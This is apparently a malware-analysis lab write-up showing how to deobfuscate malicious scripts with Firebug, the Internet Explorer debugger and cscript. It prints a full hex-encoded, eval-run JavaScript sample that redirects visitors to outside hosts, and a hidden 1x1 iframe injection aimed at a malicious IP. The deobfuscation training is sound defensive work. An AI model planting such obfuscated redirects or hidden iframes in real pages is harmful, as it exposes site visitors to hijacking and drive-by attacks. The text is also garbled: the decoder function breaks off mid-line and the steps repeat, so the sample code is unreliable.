<Mozilla>
1. Edit the sample.html file to add the debugger; statement at the beginning of the script.
2. Load script.html into Firefox using the browser's File menu.
3. Use Firebug to set a breakpoint on the eval(txt); line of the script, so that execution pauses after the text has been decoded but before it is run.
4. Look at the contents of the variable "txt" by typing the console.log(txt) command in Firebug's Console tab.
5. Examine the deobfuscated script in the Console tab.
1. Edit the sample.html file to add the debugger; statement at the beginning of the script.
2. Load script.html into Firefox using the browser's File menu.
--sample.html-
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="keywords" content="#KEYWORDS#" />
<link rel="copyright" href="http://www.gnu.org/copyleft/fdl.html" />
<title>...Berlin with the appointed export lotus notes address book of...</title>
<script>
debugger;
var arr =
"76617220726566203d20646f63756d656e742e72656665727265723b0d0a766172206c6f63203d20646f63756d656e742e6c6f636174696f6e2e687265663b0d0a696620287265662e696e6465784f662822676f6f676c652229203d3d202d31202626207265662e696e6465784f6628227961686f6f2229203d3d202d31202626207265662e696e6465784f6628226d736e2229203d3d202d3129207b0d0a09646f63756d656e742e6c6f636174696f6e2e68726566203d2022687474703a2f2f61637469766566726565686f73742e636f6d2f72656d6f7665642e7068703f75726c3d22202b206c6f633b0d0a7d20656c7365207b0d0a09696620287265662e696e6465784f662822736974653a2229203e3d2030207c7c207265662e696e6465784f662822736974652533412229203e3d203029207b0d0a0909646f63756d656e742e6c6f636174696f6e2e68726566203d2022687474703a2f2f61637469766566726565686f73742e636f6d2f72656d6f7665642e7068703f75726c3d22202b206c6f633b0d0a097d20656c7365207b0d0a0909766172207265203d206e6577205265674578702822687474703a5c2f5c2f285b612d7a302d395c2d412d5a5c2e5d2a295c2f22293b0d0a090976617220646f6d61696e203d2072652e65786563286c6f63293b0d0a090969662028646f6d61696e203d3d206e756c6c29207b0d0a090909646f63756d656e742e6c6f636174696f6e2e68726566203d2022687474703a2f2f61637469766566726565686f73742e636f6d2f72656d6f7665642e7068703f75726c3d22202b206c6f633b0d0a09097d20656c7365207b0d0a0909097265203d206e65772052656745787028225c5c2e285b612d7a302d395c2d412d5a5c2e5d2a2922293b0d0a090909746f70646f6d61696e203d2072652e6578656328646f6d61696e5b315d293b0d0a090909696620287265662e696e6465784f6628646f6d61696e5b315d2920213d202d31207c7c207265662e696e6465784f6628746f70646f6d61696e5b315d2920213d202d3129207b0d0a09090909646f63756d656e742e6c6f636174696f6e2e68726566203d2022687474703a2f2f61637469766566726565686f73742e636f6d2f72656d6f7665642e7068703f75726c3d22202b206c6f633b0d0a0909097d20656c7365207b0d0a090909097265203d206e6577205265674578702822713d5b5e265d2a22293b0d0a09090909766172206d203d2072652e6578656328726566293b0d0a09090909696620286d203d3d206e756c6c29207b0d0a09090909097265203d206e6577205265674578702822703d5b5e265d2a22293b0d0a09090909096d203d2072652e6578656328726566293
b0d0a0909090909696620286d203d3d206e756c6c29207b0d0a090909090909646f63756d656e742e6c6f636174696f6e2e68726566203d2022687474703a2f2f61637469766566726565686f73742e636f6d2f72656d6f7665642e7068703f75726c3d22202b206c6f633b0d0a09090909097d20656c7365207b0d0a0909090909097661722071203d206d5b305d2e737562737472696e672832293b0d0a09090909090971203d20712e7265706c616365282f5c2b2f2c20225f22293b0d0a09090909090971203d20712e7265706c616365282f5c732f2c20225f22293b0d0a090909090909646f63756d656e742e6c6f636174696f6e2e68726566203d2022687474703a2f2f73747570686f6d652e636f6d2f702f22202b2071202b20222e68746d6c223b0d0a09090909097d0d0a090909097d20656c7365207b0d0a09090909097661722071203d206d5b305d2e737562737472696e672832293b0d0a090909090971203d20712e7265706c616365282f5c2b2f2c20225f22293b0d0a090909090971203d20712e7265706c616365282f5c732f2c20225f22293b0d0a0909090909646f63756d656e742e6c6f636174696f6e2e68726566203d2022687474703a2f2f73747570686f6d652e636f6d2f702f22202b2071202b20222e68746d6c223b0d0a090909097d0d0a0909097d0d0a09097d0d0a097d0d0a7d0d0a";
var table = new Array();table['0'] = 0;table['1'] = 1;table['2'] = 2;table['3'] = 3;table['4'] = 4;table['5'] = 5;table['6'] = 6;table['7'] = 7;table['8'] = 8;table['9'] = 9;table['a'] = 10;table['b'] = 11;table['c'] = 12;table['d'] = 13;table['e'] = 14;table['f'] = 15;function markCounter(a) {
var txt = ""; var c = 0;
while (c < a.length) {txt += String.fromCharCode(table[a
eval(txt);
→3. Use Firebug to set a breakpoint on the eval(txt); line of the script.
4. Look at the contents of the variable "txt" by typing the console.log(txt) command in Firebug's Console tab.
5. Examine the deobfuscated script in the Console tab.
A***freehost.com
This URL appears in the deobfuscated script and is probably malicious.
---------------------------------------------------------------------------------------------------------------------------------------------------------
<IE>
1.Edit sample.html in Notepad++ to insert the "debugger;" statement in the beginning of its script.
2.Open sample.html in Internet Explorer and activate the debugger in Developer Tools.
3.Reload the script in Internet Explorer to activate the debugger.
4. Set a breakpoint using the Internet Explorer debugger on the third instance of document.write.
5.Run the script in the Internet Explorer debugger to deobfuscate its contents and reach the breakpoint.
6. Copy the contents of the variable G82B54 to the clipboard and paste them into Notepad++.
7. Examine the deobfuscated script in Notepad++, and then exit Internet Explorer and the text editor.
The URL in the deobfuscated value of G82B54 (shown below) points to a malicious site.
G82B54 "</textarea><iframe src=\http://66.109.***.198/c76c1d2643c69857e1a677d2e0f23f8e/b1fd046f3c05b517d106b003853b1441?p=ftp\ width=1 height=1 style=\"border: 0px\"></iframe>"
--------------------------------------------------------------------------------------------------------------------------------------------
<VBScript>
Using the Cscript Interpreter
1. Right-click vbscript.vbs and select Edit with Notepad++. Add the following code at the beginning of the file,
2. redefining the execute function so that, instead of executing its argument, it echoes the argument to the output:
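' Stand-in for execute: writes the code it is given to the output instead of running it.
' x - the string the script passes to execute.
Function execute(x)
    ' WScript is the host object that cscript provides; under cscript, Echo writes to
    ' standard output, so the text can be redirected to a file.
    WScript.Echo(x)
End Function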
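REM Pass the script to cscript as an argument and redirect only its output to out.txt.
REM A ">" placed before vbscript.vbs would overwrite the script file instead of running it.
REM //nologo keeps the interpreter banner out of out.txt.
cscript //nologo vbscript.vbs > out.txt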
Open out.txt and read the echoed script.
1390***.cn: this URL is a malicious site.